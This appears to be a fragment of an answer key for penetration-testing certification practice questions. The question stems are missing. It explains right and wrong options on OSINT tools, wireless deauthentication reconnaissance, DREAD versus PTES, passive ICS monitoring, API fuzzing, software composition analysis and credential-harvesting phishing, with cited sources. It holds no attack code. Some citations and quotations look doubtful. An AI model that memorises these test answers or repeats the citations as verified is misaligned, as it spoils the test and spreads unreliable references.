2. Hottel, T. (2018). A Framework for Open Source Intelligence Collection and Analysis [Master's Thesis, Utica College]. In Section 4.2.2, "theHarvester," the tool is described as being used to "gather e-mail accounts, user names, and subdomains/hostnames from public sources." This highlights its focus on organizational OSINT rather than comprehensive host service scanning. (Available via ProQuest, AAT 10976818).

3. Internet Engineering Task Force (IETF). (2004). RFC 3912: WHOIS Protocol Specification. The abstract and introduction define the protocol's purpose as providing directory services for objects in a repository, such as domain names and their associated contacts, not for scanning live services.

4. WiGLE.net. (n.d.). FAQ. Retrieved from https://wigle.net/faq. The official FAQ states, "WiGLE is short for Wireless Geographic Logging Engine... It's a website for collecting information about the different wireless hotspots around the world." This confirms its exclusive focus on wireless networks.

A. Port mirroring: This is a feature on network switches used to copy traffic from one port to another for analysis. It is a wired network technique, not a wireless disruption method.

B. Sidecar scanning: This is not a standard or recognized term in the context of wireless penetration testing. It is likely a distractor term, possibly borrowed from cloud-native architecture (sidecar proxy).

C. ARP poisoning: This is a man-in-the-middle attack that manipulates ARP tables on a local area network. While it can disrupt traffic for wireless clients, it targets Layer 2 logic, not the wireless RF communication link itself.

1. University Courseware: In the "Security of 802.11 Wireless Networks" lecture for the CS 461/ECE 422 Computer Security I course at the University of Illinois Urbana-Champaign, the attack process is outlined. It states, "To attack a network, we first need to find it. We can scan channels to find APs." This establishes scanning as the prerequisite for attacks. (Source: CS 461/ECE 422, Fall 2022, Lecture 18, Slide 35).

2. Official Vendor Documentation (NIST): The National Institute of Standards and Technology (NIST) Special Publication 800-153, Guidelines for Securing Wireless Local Area Networks (WLANs), discusses WLAN threats. Section 5.3.2, "Denial of Service," describes deauthentication attacks. Executing such an attack requires the attacker to know the channel and BSSID of the target network, which is acquired through channel scanning.

3. Academic Publication: In the paper "A Practical Demystification of the 802.11 Deauthentication Attack," the authors detail the attack methodology. The process begins with identifying the target access point and its clients, which is accomplished by monitoring wireless traffic on specific channels. This reconnaissance phase is fundamentally channel scanning. (Source: Bellardo, J., & Savage, S. (2003). A Practical Demystification of the 802.11 Deauthentication Attack. Proceedings of the USENIX Security Symposium, 2003. Section 3, "The Deauthentication Attack").

A. The target type, such as a web application, does not dictate the choice between a threat modeling methodology (DREAD) and a full lifecycle testing standard (PTES).

B. Assessing a mobile application is a matter of scope, not the reason to choose DREAD over PTES. Both can be relevant in a mobile application assessment.

C. A thick client application is a type of target. The choice between DREAD and PTES is based on the activity (threat modeling vs. overall test execution).

1. Shostack, A. (2014). Threat Modeling: Designing for Security. Wiley. In Chapter 15, "STRIDE, DREAD, and Other Models," DREAD is explicitly defined as a model for prioritizing threats, distinct from a full testing standard. (Note: While a book, this is a foundational academic and professional text in the field, authored by a creator of the methodology at Microsoft).

2. The Penetration Testing Execution Standard. (2012). The Penetration Testing Execution Standard: Technical Guidelines. Section: "Penetration Testing Execution Standard." The document defines PTES as a standard covering seven main sections for the execution of a penetration test, including "Threat Modeling," but PTES itself is the overarching standard, not the specific threat rating model.

3. Myagmar, S., Lee, A. J., & Yurcik, W. (2005). Threat Modeling as a Basis for Security Requirements. Proceedings of the 2005 IEEE Workshop on Information Assurance and Security. p. 2. This paper discusses threat modeling methodologies, including DREAD, as a formal process for analyzing a system's security "during the design phase," which aligns with the planning phase of a penetration test. DOI: https://doi.org/10.1109/IAW.2005.1495949

B. Installing packet capture software on the server: This is an intrusive action that involves modifying the server's software state, which would be considered tampering and would void the support agreement.

C. Reconfiguring the application to use a proxy: This requires changing the application's or host's configuration, which constitutes tampering and violates the client's explicit warning.

D. Requesting that certificate pinning be disabled: This is an intrusive modification to the application's security controls. It is also a step for decrypting traffic, not simply validating if encryption is present.

---

1. National Institute of Standards and Technology (NIST) Special Publication 800-82 Rev. 2, "Guide to Industrial Control Systems (ICS) Security."

Section 6.3, "Security Assessment," states, "Many of the traditional IT assessment tools and techniques can have a negative impact on an ICS... For this reason, passive techniques are preferred when assessing an ICS." This supports the choice of a non-intrusive method.

Section 6.2.2, "Network Monitoring," describes using network taps or Switched Port Analyzer (SPAN) ports on switches to passively capture network traffic for analysis, which is the technique described in the correct answer.

2. Kurose, J. F., & Ross, K. W. (2017). Computer Networking: A Top-Down Approach (7th ed.). Pearson.

Chapter 8, Section 8.2, "Principles of Network Security," discusses packet sniffing. The text differentiates between sniffing on a broadcast medium and a switched network, where a technique like port mirroring is required to see traffic not destined for the sniffer's host. This establishes port mirroring as a standard, passive network analysis technique.

3. Carnegie Mellon University, Software Engineering Institute (SEI). (2010). Network Traffic Analysis.

Section "Data Sources," describes common sources for network traffic data, including "Network Taps" and "Switch SPAN/Mirror/Monitor Ports." It notes that these methods provide a copy of network traffic without being in the direct line of communication, highlighting their passive nature suitable for monitoring without disruption.

A. Directory traversal: This attack involves using path manipulation sequences like ../ to access unauthorized directories, which are not present in the request.

C. Server-side request forgery: This attack tricks the server into making unintended requests to other resources; the provided request does not contain any parameters to initiate such an action.

D. Privilege escalation: This is a potential outcome of a successful exploit, not the specific attack technique being performed in this single request.

1. OWASP API Security Top 10 2023. The scenario aligns with testing for API2:2023 - Broken Authentication. This category describes how attackers try to compromise authentication tokens or exploit implementation flaws in authentication. Fuzzing the Authorization header is a primary method for discovering such vulnerabilities. The document states, "Attackers might try to steal user's tokens (...) or try to guess them (brute-force)." Fuzzing is an automated form of this testing.

2. NIST Special Publication 800-115, "Technical Guide to Information Security Testing and Assessment." Section 4.5.3, "Authentication Verifier," discusses testing authentication mechanisms. The guide outlines techniques such as submitting malformed credentials and tokens to check for vulnerabilities in the authentication process, which is precisely what the fuzzing in the scenario is designed to do against the API.

3. Papadimitriou, P., et al. (2021). "A Fuzzing Framework for Conformance Testing of Rich Web APIs." IEEE Transactions on Reliability, 71(2), 877-895. This peer-reviewed paper discusses the use of fuzzing to test web APIs. Section I, "Introduction," states, "Fuzzing is a popular technique for finding security vulnerabilities by providing invalid, unexpected, or random data as inputs to a computer program." Applying this to an API's Authorization header is a standard approach to finding security flaws. (DOI: https://doi.org/10.1109/TR.2021.3076383)

A. VM: A Virtual Machine (VM) is an isolated compute environment for running software; it is not a tool for analyzing code or identifying vulnerable libraries.

B. IAST: Interactive Application Security Testing (IAST) analyzes application runtime behavior to find vulnerabilities, but it does not focus on creating a comprehensive inventory of component versions and their known CVEs.

C. DAST: Dynamic Application Security Testing (DAST) is a black-box method that tests a running application from the outside and cannot inspect the internal code or its constituent libraries.

1. National Institute of Standards and Technology (NIST). (2022). Secure Software Development Framework (SSDF) Version 1.1: Recommendations for Mitigating the Risk of Software Vulnerabilities (NIST Special Publication 800-218). Section 4, Practice PW.8.1 states, "Use software composition analysis (SCA) tools to create a software bill of materials (SBOM) and check for known vulnerabilities in the software’s components (e.g., libraries, modules, frameworks)."

2. Open Web Application Security Project (OWASP). (2021). OWASP Top 10:2021. A06:2021 – Vulnerable and Outdated Components. The "How to Prevent" section recommends using "software composition analysis (SCA) tools to help automate this process. Many SCA tools integrate into the CI/CD pipeline to identify outdated or vulnerable components during the build and compile phase."

3. Kaluarachchi, K. K. R. G. K. D. K., et al. (2021). "A Systematic Literature Review on Software Composition Analysis." IEEE Access, vol. 9, pp. 149393-149412. Section I (Introduction) defines SCA as "the process of identifying the open-source components in a codebase to evaluate security, license compliance, and code quality." (DOI: https://doi.org/10.1109/ACCESS.2021.3121618)

A. Gaining remote access using BeEF

BeEF (Browser Exploitation Framework) is used to hook and control a victim's browser for further exploitation, not primarily for harvesting credentials via a cloned web form.

B. Obtaining the list of email addresses using theHarvester

theHarvester is an open-source intelligence (OSINT) tool used during the reconnaissance phase to gather information like email addresses, not to execute the phishing attack itself.

D. Launching a phishing campaign using GoPhish

While GoPhish is a valid tool for phishing, "harvesting credentials" is a more specific and accurate objective for cloning a login page than the broader term "launching a phishing campaign."

---

1. Kennedy, D., O'Gorman, J., Kearns, D., & Aharoni, M. (2011). Metasploit: The Penetration Tester's Guide. No Starch Press.

Page 218, Chapter 10, "The Social-Engineer Toolkit": The text explicitly describes SET's "Credential Harvester Attack Method," stating, "The harvester is a great way to grab usernames and passwords from unsuspecting users... SET will create a clone of the website and when the victim enters his or her credentials, they will be posted back to a report..." This directly supports option C.

2. Engebretson, P. (2013). The Basics of Hacking and Penetration Testing: Ethical Hacking and Penetration Testing Made Easy (2nd ed.). Syngress.

Page 157, Chapter 6, "Social Engineering": This academic textbook details the use of SET for social engineering, highlighting the credential harvester as a key feature for phishing attacks aimed at stealing user credentials. It distinguishes this from tools like BeEF, which are covered in the context of client-side attacks.

3. Kali Linux Documentation. (n.d.). theHarvester. Kali.org.

Information Gathering Tools Section: The official documentation for Kali Linux (a standard penetration testing distribution) describes theHarvester as a tool for gathering emails, subdomains, hosts, employee names, open ports, and banners from different public sources (OSINT). This confirms it is a reconnaissance tool, making option B incorrect.

4. The BeEF Project. (n.d.). What is BeEF?. beefproject.com.

Official Project Website: The official documentation states, "BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser." It details hooking browsers to launch command modules, which is distinct from the credential harvesting method described in the question, making option A incorrect.